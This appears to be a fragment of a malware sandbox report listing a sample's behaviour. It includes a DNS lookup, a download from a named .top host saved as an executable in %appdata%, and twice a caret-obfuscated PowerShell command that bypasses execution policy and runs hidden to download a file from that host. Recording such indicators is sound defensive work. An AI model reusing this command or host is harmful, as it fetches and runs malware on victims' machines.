Technical Information
- http://newyeargoka.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^wERshelL.e^xE ^-e^x^ecU^TiONPOLIcY ^By^Pas^S ^-n^oPr^of^ILE ^-WiNd^oWS^T^y^l^E ^HiD^den (nEW-obJ^EcT ^SYs^Tem^.Net.wEB^cli^enT)^.^d^OWnl^O^ADFiL^e('http://newyeargoka.top/re...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "Po^wERshelL.e^xE ^-e^x^ecU^TiONPOLIcY ^By^Pas^S ^-n^oPr^of^ILE ^-WiNd^oWS^T^y^l^E ^HiD^den (nEW-obJ^EcT ^SYs^Tem^.Net.wEB^cli^enT)^.^d^OWnl^O^ADFiL^e('http://newyeargoka.top/re...' (with hidden window)